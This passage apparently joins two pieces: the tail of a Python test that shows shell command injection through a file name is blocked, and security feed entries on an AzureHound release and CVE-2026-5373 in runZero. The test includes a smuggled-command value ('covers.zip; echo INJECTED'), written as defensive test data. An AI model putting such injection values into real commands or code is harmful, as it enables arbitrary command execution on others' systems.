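        evil = "covers.zip; echo INJECTED"
        unsafe_out = run_unsafe(evil, tmp)
        try:
            run_safe(evil, tmp)
            blocked = False
        except ValueError:
            blocked = True
        return {
            "unsafe_injected": "INJECTED" in unsafe_out,
            "safe_blocks": blocked,
            "safe_lists_file": run_safe(good, tmp).strip().endswith(good),
        }
```

Both halves matter: argv removes the shell from the path entirely, and the allow-list keeps the filename from steering the tool through its own option syntax or a relative path.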
2026-04-07 15:44Z · INFO

v2.12.0-rc1

Source: AzureHound releases · github.com

AzureHound v2.12.0-rc1 released with bug fixes: removal of a race condition in unit tests, corrected role-filtering logic for listResourceGroupUserAccessAdmins, and expanded collection of AzureContributor role assignments across management groups, resource groups and subscriptions.

Identity · Cloud · Vendor: SpecterOps, Microsoft Azure · Type: Tool · Score: 35
2026-04-07 15:17Z · HIGH

CVE-2026-5373 — runZero Platform: all-organization administrators could promote accounts to superuser (fixed in 4.0.260202.0)

Source: NVD (auto-promoted CVEs) · nvd.nist.gov · CVE-2026-5373

An issue that allowed all-organization administrators to promote accounts to superuser status has been resolved. This is an instance of CWE-269 (Improper Privilege Management), with an estimated CVSS score of 8.1 (High), vector CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N. Fixed in version 4.0.260202.0 of the runZero Platform.

CVSS v3.1: 8.1 (HIGH) · CWE-269 · Type: Vulnerability · Score: 91